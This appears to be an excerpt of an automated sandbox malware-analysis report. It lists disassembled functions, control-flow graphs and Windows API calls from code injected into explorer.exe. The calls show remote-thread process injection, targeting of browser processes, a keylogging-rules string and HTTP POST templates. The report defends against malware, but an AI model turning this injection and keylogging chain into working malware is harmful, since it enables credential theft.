                                                                                                        • Thread32Next.KERNEL32(00000000,0000001C), ref: 0058255B
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00582566
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.4174510515.0000000000581000.00000040.80000000.00040000.00000000.sdmp, Offset: 00581000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_581000_explorer.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                                                        • String ID:
                                                                                                        • API String ID: 1467098526-0
                                                                                                        • Opcode ID: af3faf389965807ac9bcc81fab5667ac676848d0ef0ef5d0dc1e22113c23d6bb
                                                                                                        • Instruction ID: ba8a5330c016a3e46ca22d25c825e4d54f3bc4d4804e10ca307d429c65fa23b8
                                                                                                        • Opcode Fuzzy Hash: af3faf389965807ac9bcc81fab5667ac676848d0ef0ef5d0dc1e22113c23d6bb
                                                                                                        • Instruction Fuzzy Hash: 08113CB1444201EBD701AF61AC4DB6EBFA8FB95B01F144529FE41B6150E7318A09ABA3

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 00582861: GetProcessHeap.KERNEL32(00000008,0000A000,005810CC), ref: 00582864
                                                                                                          • Part of subcall function 00582861: RtlAllocateHeap.NTDLL(00000000), ref: 0058286B
                                                                                                          • Part of subcall function 005827E2: lstrlen.KERNEL32(005840DA,?,00000000,00000000,00581F86,74DE8A60,005840DA,00000000), ref: 005827EA
                                                                                                          • Part of subcall function 005827E2: MultiByteToWideChar.KERNEL32(00000000,00000000,005840DA,00000001,00000000,00000000), ref: 005827FC
                                                                                                          • Part of subcall function 00582374: RtlZeroMemory.NTDLL(?,00000018), ref: 00582386
                                                                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 00581FE2
                                                                                                        • wsprintfW.USER32 ref: 0058211B
                                                                                                        • wsprintfW.USER32 ref: 00582186
                                                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00582250
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.4174510515.0000000000581000.00000040.80000000.00040000.00000000.sdmp, Offset: 00581000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_581000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                                                        • API String ID: 4204651544-1701262698
                                                                                                        • Opcode ID: 359da583099a54202c89cf71f7f7058854614c8eadef9d22798a69e5a4c108f7
                                                                                                        • Instruction ID: ed66d1a5eb4fb1c91f076f3b9672d4b1c0eec33bb49eb97d40144693503d33b5
                                                                                                        • Opcode Fuzzy Hash: 359da583099a54202c89cf71f7f7058854614c8eadef9d22798a69e5a4c108f7
                                                                                                        • Instruction Fuzzy Hash: 1EA14D75608305AFD710EF64D889A2BBFE9FB98740F10492DFD86E3251DA70DA08DB52

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 414 5825ad-5825c9 OpenProcess 415 5825cb-5825da IsWow64Process 414->415 416 582600-582607 414->416 417 5825dc-5825ec IsWow64Process 415->417 418 5825f7 415->418 419 5825f9-5825fa CloseHandle 417->419 420 5825ee-5825f5 417->420 418->419 419->416 420->419
                                                                                                        APIs
                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,74DEE800,?,?,microsoftedgecp.exe,00581287), ref: 005825BF
                                                                                                        • IsWow64Process.KERNEL32(000000FF,?), ref: 005825D1
                                                                                                        • IsWow64Process.KERNEL32(00000000,?), ref: 005825E4
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 005825FA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.4174510515.0000000000581000.00000040.80000000.00040000.00000000.sdmp, Offset: 00581000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_581000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Process$Wow64$CloseHandleOpen
                                                                                                        • String ID: microsoftedgecp.exe
                                                                                                        • API String ID: 331459951-1475183003
                                                                                                        • Opcode ID: 65a8fae8f1c09d287f01033bb0e34ece0c03d54d1a021fc76a680fe54c0f2e67
                                                                                                        • Instruction ID: 20cfa8eceb7fe2ef8ea239e19653a843a62c49a65f2ebdc32254858e2b3f880d
                                                                                                        • Opcode Fuzzy Hash: 65a8fae8f1c09d287f01033bb0e34ece0c03d54d1a021fc76a680fe54c0f2e67
                                                                                                        • Instruction Fuzzy Hash: DEF06D71946618FFDB109F909D888AE7FACEB01651F14126AED10B6140D7314F08B7A0

                                                                                                        Callgraph

                                                                                                        callgraph 0 Function_00821000 1 Function_00822E80 2 Function_00821A04 3 Function_00821405 4 Function_0082A00A 5 Function_00823088 14 Function_00822E98 5->14 51 Function_00821B70 5->51 6 Function_00822E08 15 Function_00822418 6->15 35 Function_00821D50 6->35 46 Function_00821860 6->46 49 Function_008218E8 6->49 7 Function_00822508 33 Function_008225C4 7->33 36 Function_008218D0 7->36 45 Function_008224E0 7->45 8 Function_00821C08 9 Function_00821A88 10 Function_00821508 11 Function_0082188C 28 Function_00821838 11->28 12 Function_00822010 12->2 13 Function_0082B115 14->2 14->6 30 Function_00822CB8 14->30 39 Function_00821DD4 14->39 53 Function_00822B70 14->53 57 Function_00822BF4 14->57 15->28 40 Function_00822054 15->40 15->46 16 Function_0082141D 17 Function_00821822 18 Function_00823020 18->14 18->51 19 Function_00821D20 20 Function_00822620 21 Function_00823220 21->8 25 Function_00821C28 21->25 27 Function_00821BB0 21->27 21->28 29 Function_00821938 21->29 48 Function_00822860 21->48 21->51 22 Function_008241A1 23 Function_008245A7 24 Function_00829FAB 34 Function_0082A048 24->34 26 Function_008214B2 30->19 30->28 30->46 31 Function_00821F40 31->28 58 Function_008218F8 31->58 32 Function_00824A41 60 Function_008225FC 33->60 34->4 35->28 37 Function_00821254 38 Function_008214D4 39->28 40->11 40->12 40->28 40->29 40->31 40->36 40->46 52 Function_00821E70 40->52 40->58 41 Function_0082B0D5 42 Function_00821C58 43 Function_00824059 44 Function_0082355C 44->21 44->28 44->44 44->51 54 Function_008230F0 44->54 46->51 47 Function_00821560 48->20 48->51 56 Function_00822774 48->56 50 Function_0082156C 53->2 53->28 54->7 54->9 54->28 54->42 54->46 55 Function_00821576 59 Function_008214F9

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 119 82355c-82356c call 821b70 122 823572-8235a5 call 821838 119->122 123 8235fc-823601 119->123 127 8235d1-8235f6 NtUnmapViewOfSection 122->127 128 8235a7 call 821838 122->128 132 823608-823617 call 823220 127->132 133 8235f8-8235fa 127->133 130 8235ac-8235c5 128->130 130->127 139 823621-82362a 132->139 140 823619-82361c call 82355c 132->140 133->123 134 823602-823607 call 8230f0 133->134 134->132 140->139
                                                                                                        APIs
                                                                                                        • NtUnmapViewOfSection.NTDLL ref: 008235D8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.4174299297.0000000000821000.00000040.80000000.00040000.00000000.sdmp, Offset: 00821000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_17_2_821000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: SectionUnmapView
                                                                                                        • String ID:
                                                                                                        • API String ID: 498011366-0
                                                                                                        • Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                                                                        • Instruction ID: 8bd715b8cdb27258873e3ca573d4dc486bc37f67a1337266efd3f6288b525948
                                                                                                        • Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                                                                        • Instruction Fuzzy Hash: FF119430615E195FEF58BBBCA8AD27937A4FB69302F54013AA419C76A1DA3D8A81C701

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 0 823220-82325b call 821838 3 823261-823273 CreateToolhelp32Snapshot 0->3 4 823549-823554 SleepEx 3->4 5 823279-82328f Process32First 3->5 4->3 6 823538-82353a 5->6 7 823540-823543 CloseHandle 6->7 8 823294-8232ac 6->8 7->4 10 8232b2-8232c6 8->10 11 82348c-823495 call 821bb0 8->11 10->11 17 8232cc-8232e0 10->17 15 82352a-823532 Process32Next 11->15 16 82349b-8234a4 call 821c08 11->16 15->6 16->15 21 8234aa-8234b1 call 821c28 16->21 17->11 22 8232e6-8232fa 17->22 21->15 27 8234b3-8234c1 call 821b70 21->27 22->11 26 823300-823314 22->26 26->11 31 82331a-82332e 26->31 27->15 32 8234c3-823525 call 821938 call 822860 call 821938 27->32 31->11 36 823334-823348 31->36 32->15 36->11 41 82334e-823362 36->41 41->11 44 823368-82337c 41->44 44->11 46 823382-823396 44->46 46->11 48 82339c-8233b0 46->48 48->11 50 8233b6-8233ca 48->50 50->11 52 8233d0-8233e4 50->52 52->11 54 8233ea-8233fe 52->54 54->11 56 823404-823418 54->56 56->11 58 82341a-82342e 56->58 58->11 60 823430-823444 58->60 60->11 62 823446-82345a 60->62 62->11 64 82345c-823470 62->64 64->11 66 823472-823486 64->66 66->11 66->15
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.4174299297.0000000000821000.00000040.80000000.00040000.00000000.sdmp, Offset: 00821000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_17_2_821000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
                                                                                                        • String ID:
                                                                                                        • API String ID: 2482764027-0
                                                                                                        • Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                                                                        • Instruction ID: 8da1a4398fcdcce429c65f31612aec8507ddf25569fe7c4af2b3d236bfc75717
                                                                                                        • Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                                                                        • Instruction Fuzzy Hash: 868131312186188FEB06EF24FC58BEAB7A1FB60741F54466AA446C7160EF7CDA44CB81

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 68 82a048-82a04b 69 82a055-82a059 68->69 70 82a065 69->70 71 82a05b-82a063 69->71 72 82a067 70->72 73 82a04d-82a053 70->73 71->70 74 82a06a-82a071 72->74 73->69 76 82a073-82a07b 74->76 77 82a07d 74->77 76->77 77->74 78 82a07f-82a082 77->78 79 82a097-82a0a4 78->79 80 82a084-82a092 78->80 90 82a0a6-82a0a8 79->90 91 82a0be-82a0cc call 82a00a 79->91 81 82a094-82a095 80->81 82 82a0ce-82a0e9 80->82 81->79 84 82a11a-82a11d 82->84 85 82a122-82a129 84->85 86 82a11f-82a120 84->86 89 82a12f-82a133 85->89 88 82a101-82a105 86->88 92 82a107-82a10a 88->92 93 82a0eb-82a0ee 88->93 94 82a190-82a1e4 VirtualProtect * 2 89->94 95 82a135-82a14e LoadLibraryA 89->95 96 82a0ab-82a0b2 90->96 91->69 92->85 97 82a10c-82a110 92->97 93->85 101 82a0f0 93->101 98 82a1e8-82a1ed 94->98 100 82a14f-82a156 95->100 113 82a0b4-82a0ba 96->113 114 82a0bc 96->114 102 82a112-82a119 97->102 103 82a0f1-82a0f5 97->103 98->98 104 82a1ef-82a1fe 98->104 100->89 106 82a158 100->106 101->103 102->84 103->88 107 82a0f7-82a0f9 103->107 110 82a164-82a16c 106->110 111 82a15a-82a162 106->111 107->88 112 82a0fb-82a0ff 107->112 115 82a16e-82a17a 110->115 111->115 112->88 112->92 113->114 114->91 114->96 117 82a185-82a18f 115->117 118 82a17c-82a183 115->118 118->100
                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNELBASE ref: 0082A147
                                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 0082A1BB
                                                                                                        • VirtualProtect.KERNELBASE ref: 0082A1D9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.4174299297.0000000000827000.00000040.80000000.00040000.00000000.sdmp, Offset: 00827000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_17_2_827000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual$LibraryLoad
                                                                                                        • String ID:
                                                                                                        • API String ID: 895956442-0
                                                                                                        • Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                                                                        • Instruction ID: 2d34ec8003db4864a7734e0c0adba5202491a87c45e21cee3b5f88b45b4dbd25
                                                                                                        • Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                                                                        • Instruction Fuzzy Hash: CB512731758D3D8BCB2CAA78ACC46B5B7C1FF55335F58062AD48AC3285E959D8C68383

                                                                                                        Callgraph

                                                                                                        callgraph 0 Function_02F225F1 1 Function_02F29AE0 2 Function_02F21E66 21 Function_02F21CBF 2->21 3 Function_02F229E7 4 Function_02F21FEA 5 Function_02F229EB 29 Function_02F22724 5->29 6 Function_02F22569 7 Function_02F2276D 8 Function_02F2275A 9 Function_02F21ED8 10 Function_02F2255C 11 Function_02F217DC 43 Function_02F22A09 11->43 12 Function_02F22841 13 Function_02F226C9 14 Function_02F224CC 15 Function_02F21533 16 Function_02F21FB4 27 Function_02F21E26 16->27 17 Function_02F21F3A 17->2 17->4 17->16 22 Function_02F229BD 17->22 18 Function_02F216B9 18->5 18->11 19 Function_02F2293E 19->5 19->43 20 Function_02F218BF 23 Function_02F21BBD 20->23 26 Function_02F21B26 20->26 20->29 24 Function_02F2243D 42 Function_02F2298A 24->42 24->43 25 Function_02F220A1 25->5 25->14 25->22 25->24 25->42 25->43 46 Function_02F2240F 25->46 47 Function_02F2288D 25->47 27->21 28 Function_02F23627 30 Function_02F225A4 30->43 31 Function_02F210A5 31->5 31->7 31->8 31->12 31->13 31->20 31->29 34 Function_02F212AE 31->34 35 Function_02F226AE 31->35 31->43 45 Function_02F2268F 31->45 31->47 32 Function_02F2162B 32->18 33 Function_02F229AE 34->5 34->6 34->10 34->12 34->22 34->33 34->43 36 Function_02F213AE 36->0 36->5 36->17 39 Function_02F22799 36->39 36->43 44 Function_02F21E89 36->44 37 Function_02F2182D 37->5 37->30 37->33 37->43 48 Function_02F2200D 37->48 38 Function_02F21016 38->5 38->7 38->8 38->12 38->13 38->20 38->29 38->31 38->34 38->35 38->36 38->43 38->45 38->47 40 Function_02F21000 40->38 41 Function_02F21581 41->5 41->18 41->19 41->29 41->43 44->4 44->9 44->29 46->12 48->5 48->25 48->43

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 02F22724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,02F229F3,-00000001,02F2128C), ref: 02F22731
                                                                                                          • Part of subcall function 02F22A09: GetProcessHeap.KERNEL32(00000008,0000A000,02F210BF), ref: 02F22A0C
                                                                                                          • Part of subcall function 02F22A09: RtlAllocateHeap.NTDLL(00000000), ref: 02F22A13
                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 02F21038
                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 02F2106C
                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 02F21075
                                                                                                        • GetCurrentProcessId.KERNEL32(?,02F21010), ref: 02F2107B
                                                                                                        • wsprintfA.USER32 ref: 02F210E7
                                                                                                        • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 02F21155
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02F21160
                                                                                                        • Process32First.KERNEL32(00000000,?), ref: 02F2117F
                                                                                                        • CharLowerA.USER32(?), ref: 02F21199
                                                                                                        • lstrcmpiA.KERNEL32(?,explorer.exe), ref: 02F211B5
                                                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02F21212
                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 02F2126C
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02F2127F
                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 02F2129F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateCharCloseCreateCurrentFirstHandleLowerNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
                                                                                                        • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                                                                        • API String ID: 3206029838-2805246637
                                                                                                        • Opcode ID: ab3a4ec9de356ff4f78175b0056dfc080fb4bf1d4b1b4d30045b56d7287d0a90
                                                                                                        • Instruction ID: d3fb2b44c83e1fc4a38df32432614dc901bb20f882fd9c03df14886b46a2f09e
                                                                                                        • Opcode Fuzzy Hash: ab3a4ec9de356ff4f78175b0056dfc080fb4bf1d4b1b4d30045b56d7287d0a90
                                                                                                        • Instruction Fuzzy Hash: F4510570E442295BD724EF70DC44A7BB7AAEB47BC4F010A28BB49972C1DB34990D8F61

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 02F22A09: GetProcessHeap.KERNEL32(00000008,0000A000,02F210BF), ref: 02F22A0C
                                                                                                          • Part of subcall function 02F22A09: RtlAllocateHeap.NTDLL(00000000), ref: 02F22A13
                                                                                                        • wsprintfA.USER32 ref: 02F210E7
                                                                                                          • Part of subcall function 02F2276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 02F22777
                                                                                                          • Part of subcall function 02F2276D: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,02F210FE), ref: 02F22789
                                                                                                        • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 02F21155
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02F21160
                                                                                                        • Process32First.KERNEL32(00000000,?), ref: 02F2117F
                                                                                                        • CharLowerA.USER32(?), ref: 02F21199
                                                                                                        • lstrcmpiA.KERNEL32(?,explorer.exe), ref: 02F211B5
                                                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02F21212
                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 02F2126C
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02F2127F
                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 02F2129F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileHeapProcess32lstrcmpi$AllocateCharCloseCreateFirstHandleLowerMappingMemoryMoveNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                                                                                                        • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                                                                        • API String ID: 3018447944-2805246637
                                                                                                        • Opcode ID: 5e48dd9153652e786798788f3fc5a78e4e9631bef502c7345e86507a1157d417
                                                                                                        • Instruction ID: 77a59c78602ea1920e8507b9a3285ca301c0c94fdfdd1fae6595a46553c304d6
                                                                                                        • Opcode Fuzzy Hash: 5e48dd9153652e786798788f3fc5a78e4e9631bef502c7345e86507a1157d417
                                                                                                        • Instruction Fuzzy Hash: BA41EB71A043255BD724EF648C84A7BB79AEB477D4F010918BF49972C1EB34D90D8F61

                                                                                                        Control-flow Graph (rendered graph omitted; basic blocks 2f29ae0-2f29cad; API calls in graph: LoadLibraryA, GetProcAddress, VirtualProtect * 2)
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F28000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F28000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f28000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4135ba2377cce62e9158bbc91fd009143de1bf4a8065c8168efe2ff047589653
                                                                                                        • Instruction ID: 9c748d3601187bdbc63fd48e8dbc5814f393dab40ec35e48576d83a8cd50c9ec
                                                                                                        • Opcode Fuzzy Hash: 4135ba2377cce62e9158bbc91fd009143de1bf4a8065c8168efe2ff047589653
                                                                                                        • Instruction Fuzzy Hash: AF51EA72E542728BD7218A78CC807A57794EB432A4F380739D6E5CB3C6E7D4590EC750

                                                                                                        Control-flow Graph (rendered graph omitted; basic blocks 2f2276d-2f22798; API calls in graph: OpenFileMappingA, MapViewOfFile)
                                                                                                        APIs
                                                                                                        • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 02F22777
                                                                                                        • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,02F210FE), ref: 02F22789
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$MappingOpenView
                                                                                                        • String ID:
                                                                                                        • API String ID: 3439327939-0
                                                                                                        • Opcode ID: 0dc54c0e6cc7fc0ebe74eabf6a1ae08950c579bea2f8a51f19c45ffa023ccc64
                                                                                                        • Instruction ID: 6d8942ffca6115569cd95c9d87ee6d5cead323b34cd5d5e33c96754f06898cf6
                                                                                                        • Opcode Fuzzy Hash: 0dc54c0e6cc7fc0ebe74eabf6a1ae08950c579bea2f8a51f19c45ffa023ccc64
                                                                                                        • Instruction Fuzzy Hash: 93D01772F45232BBE3349A7B6C0CF83BE9DDF86EE5B020025B90DD2140D6648820C2F0

                                                                                                        Control-flow Graph (rendered graph omitted; basic block 2f2275a-2f2276c; API calls in graph: UnmapViewOfFile, CloseHandle)
                                                                                                        APIs
                                                                                                        • UnmapViewOfFile.KERNEL32(00000000,?,02F2129A,00000001), ref: 02F2275E
                                                                                                        • CloseHandle.KERNELBASE(?,?,02F2129A,00000001), ref: 02F22765
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseFileHandleUnmapView
                                                                                                        • String ID:
                                                                                                        • API String ID: 2381555830-0
                                                                                                        • Opcode ID: 01b731a3d54e4a134f779fd3cc46b0daf220c0055981897e3fc99f66089199f8
                                                                                                        • Instruction ID: b64a2e9f895842cce492017f191bc8dd5f3b441708a0e4237679655595262d4f
                                                                                                        • Opcode Fuzzy Hash: 01b731a3d54e4a134f779fd3cc46b0daf220c0055981897e3fc99f66089199f8
                                                                                                        • Instruction Fuzzy Hash: 56B012B2C4903497C334A734780CCDBBE18EE4BAA530709C4F10D810044B2C081587F8

                                                                                                        Control-flow Graph (rendered graph omitted; basic block 2f22a09-2f22a19; API calls in graph: GetProcessHeap, RtlAllocateHeap)
                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000A000,02F210BF), ref: 02F22A0C
                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 02F22A13
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 1357844191-0
                                                                                                        • Opcode ID: da2af24a5e45c57c4bb2e595d1d812a728b3867f92d9f8eff71f4979265e48c7
                                                                                                        • Instruction ID: 39a4a3f262734af1c3b514da35106b02f528699d8e28843e7e77a6641c6f32d0
                                                                                                        • Opcode Fuzzy Hash: da2af24a5e45c57c4bb2e595d1d812a728b3867f92d9f8eff71f4979265e48c7
                                                                                                        • Instruction Fuzzy Hash: 38A002F1F901086BDD5897E4990DF15B658E745F45F0149847246C50409D79545C8735

                                                                                                        APIs
                                                                                                          • Part of subcall function 02F22724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,02F229F3,-00000001,02F2128C), ref: 02F22731
                                                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 02F218F4
                                                                                                        • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 02F2192F
                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 02F219BF
                                                                                                        • RtlMoveMemory.NTDLL(00000000,02F23638,00000016), ref: 02F219E6
                                                                                                        • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 02F21A0E
                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 02F21A1E
                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02F21A38
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 02F21A40
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02F21A4E
                                                                                                        • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02F21A55
                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 02F21A6B
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02F21A72
                                                                                                        • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02F21A88
                                                                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02F21AB2
                                                                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02F21AC5
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02F21ACC
                                                                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02F21AD3
                                                                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02F21AE7
                                                                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02F21AFE
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02F21B0B
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02F21B11
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02F21B17
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 02F21B1A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                                                        • String ID: atan$ntdll$opera_shared_counter
                                                                                                        • API String ID: 1066286714-2737717697
                                                                                                        • Opcode ID: fc83e5b8890e8723453ba292f661d3124405aeaab53867872c7eb746b66c6c31
                                                                                                        • Instruction ID: cd7c7800c3e5a066eb9abefa34e14d1da34a96e11ffa27472a3bf0451f555d91
                                                                                                        • Opcode Fuzzy Hash: fc83e5b8890e8723453ba292f661d3124405aeaab53867872c7eb746b66c6c31
                                                                                                        • Instruction Fuzzy Hash: 1F61A271A44319AFE320DF248C84E6BBBEDEB4A798F010959FA49D3241D774D908CB76

                                                                                                        APIs
                                                                                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 02F227B5
                                                                                                        • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 02F227CD
                                                                                                        • lstrlen.KERNEL32(?,00000000), ref: 02F227D5
                                                                                                        • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 02F227E0
                                                                                                        • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 02F227FA
                                                                                                        • wsprintfA.USER32 ref: 02F22811
                                                                                                        • CryptDestroyHash.ADVAPI32(?), ref: 02F2282A
                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 02F22834
